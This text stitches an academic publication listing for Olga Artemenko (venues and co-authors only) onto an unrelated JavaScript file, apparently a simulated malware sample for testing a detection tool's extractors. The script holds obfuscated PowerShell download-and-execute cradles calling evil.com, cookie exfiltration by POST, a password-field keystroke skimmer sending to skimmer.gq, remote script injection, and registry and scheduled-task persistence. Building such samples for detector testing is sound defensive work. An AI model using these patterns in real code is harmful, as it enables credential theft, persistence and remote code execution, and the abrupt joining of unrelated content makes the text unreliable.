Olga Artemenko

21 papers Misc 5Journal 1Unranked 15
YearRankTypeTitle / Venue / Authors
2025 conf
ITPM
Olga Artemenko, Hanna Hesheva, Serhii Pasichnyk
2024 conf
ITPM
Vitaliy Lazoryshynets, Volodymyr Pasichnyk, Nataliia Kunanets, Olga Artemenko, Andrii Sihaiov, Hanna Hesheva
2023 Misc conf
CSIT
Olga Artemenko, Serhii Osadchuk, Oleksandr Brukhalskyi
2023 conf
MoMLeT+DS
Taras Basyuk, Andrii Vasyliuk, Olga Artemenko
2023 conf
MoMLeT+DS
Nataliia Kunanets, Olga Artemenko, Volodymyr Pasichnyk, Vasyl Kut, Arsen Ivanchov
2023 Misc conf
CSIT
Olga Artemenko, Nazarii Seniura, Oleksandr Lozytskyy
2022 Misc conf
CSIT
Liubava S. Chernova, Anna Zhuravel, Lyudmila Chernova, Serhii Chernov, Nataliia Kunanets, Olga Artemenko
2021 conf
CSIT (2)
Yuriy Pankiv, Nataliia Kunanets, Olga Artemenko, Antonii Rzheuskyi, Serhii Osadchuk
2021 conf
ITPM
Olga Artemenko, Nataliia Kunanets, Volodymyr Pasichnyk, Vasyl Kut, Oleksandr Lozytskyi
2021 conf
CSIT (2)
Yuriy Pankiv, Nataliia Kunanets, Olga Artemenko, Nataliia Veretennikova, Ruslan Nebesnyi
2021 conf
CSIT (2)
Roman Bakhmut, Nataliia Kunanets, Volodymyr Pasichnyk, Olga Artemenko, Ivan Tsmots
2020 conf
MoMLeT+DS
Petro Kravets, Volodymyr Pasichnyk, Olga Artemenko, Antonii Rzheuskyi
2020 conf
ITPM
Olga Artemenko, Volodymyr Pasichnyk, Halyna Korz, Pavlo Fedorka, Yaroslav Kis
2020 conf
CSIT (2)
Olga Artemenko, Volodymyr Pasichnyk, Nataliia Kunanets
2020 conf
COLINS
Olga Artemenko, Volodymyr Pasichnyk, Nataliia Kunanets, Khrystyna Shunevych
2019 conf
CSIT (2)
Olga Artemenko, Volodymyr Pasichnyk, Natalia Kunanec
2019 conf
CSIT (3)
Olga Artemenko, Volodymyr Pasichnyk, Natalia Kunanec, Danylo Tabachyshyn
2015 Misc conf
CSIT
Volodymyr Pasichnyk, Olga Artemenko
2009 J jnl
Int. J. Comput.
Yaroslav Vyklyuk, Olga Artemenko
2006 Misc conf
SAC
Olga Artemenko, Thomas Mandl, Margaryta Shramko, Christa Womser-Hacker
2005 conf
LWA
Olga Artemenko, Thomas Mandl, Margaryta Shramko, Christa Womser-Hacker
test_files/test_malicious.js
← Index test_files/test_malicious.js javascript
// Simulated malicious JavaScript sample for testing REDB JS extractors
// This file contains common malware patterns for analysis validation

var _0x4a2f = ["\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64"];
var _0xb3 = ["\x57\x53\x63\x72\x69\x70\x74"];

// Obfuscated string reconstruction
var cmd = String.fromCharCode(112, 111, 119, 101, 114, 115, 104, 101, 108, 108);
var encoded_payload = "cG93ZXJzaGVsbCAtZXAgYnlwYXNzIC1jICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly9ldmlsLmNvbS9zdGFnZTInKSI=";

// WScript-based malware pattern
var shell = WScript.CreateObject("WScript.Shell");
var fso = WScript.CreateObject("Scripting.FileSystemObject");

// Eval-based code execution
eval(function(p, a, c, k, e, d) {
    while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + c.toString(a) + '\\b', 'g'), k[c]) } }
    return p
}('1 0="2://3.4/5";', 6, 6, 'url|var|http|malware|example|download'.split('|'), 0, {}));

// Network communication
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.1.100:8080/exfil", true);
xhr.send(document.cookie);

// File system operations
var stream = WScript.CreateObject("ADODB.Stream");
stream.Open();
stream.Type = 1;

// Registry manipulation
shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "C:\\Users\\Public\\malware.exe");

// Dynamic script injection
var s = document.createElement("script");
s.src = "https://evil-cdn.tk/inject.js";
document.body.appendChild(s);

// DOM skimmer pattern
document.querySelector("input[type=password]").addEventListener("keyup", function(e) {
    fetch("https://skimmer.gq/collect", {
        method: "POST",
        body: JSON.stringify({val: e.target.value})
    });
});

// Crypto miner pattern
var worker = new Worker("data:application/javascript," + atob(encoded_payload));

// Additional obfuscation: concatenated strings
var c2_url = "ht" + "tp" + "://" + "bad" + "guy" + ".r" + "u/" + "gate";

// setTimeout with string execution
setTimeout("eval(atob('" + encoded_payload + "'))", 1000);

function downloadPayload(url) {
    var req = WScript.CreateObject("MSXML2.XMLHTTP");
    req.open("GET", url, false);
    req.send();
    return req.responseText;
}

function persist() {
    shell.Run("cmd.exe /c schtasks /create /tn UpdateCheck /tr C:\\payload.exe /sc daily", 0, false);
    shell.Exec("powershell -ep bypass -c IEX(payload)");
}

downloadPayload(_0x4a2f[0]);
persist();

// Packer-style single-line payload to give the obfuscation heuristic the
// strong-signal evidence it expects from real obfuscator.io output: hex-escape
// density >5% and a max_line >10K chars. The repeat() saturates both.
var _0xpayload="\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x73\x74\x61\x67\x65\x32\x2e\x6a\x73\x3f\x69\x64\x3d".repeat(800)+"\x22\x49\x45\x58\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x53\x74\x72\x69\x6e\x67\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64\x27\x29\x22";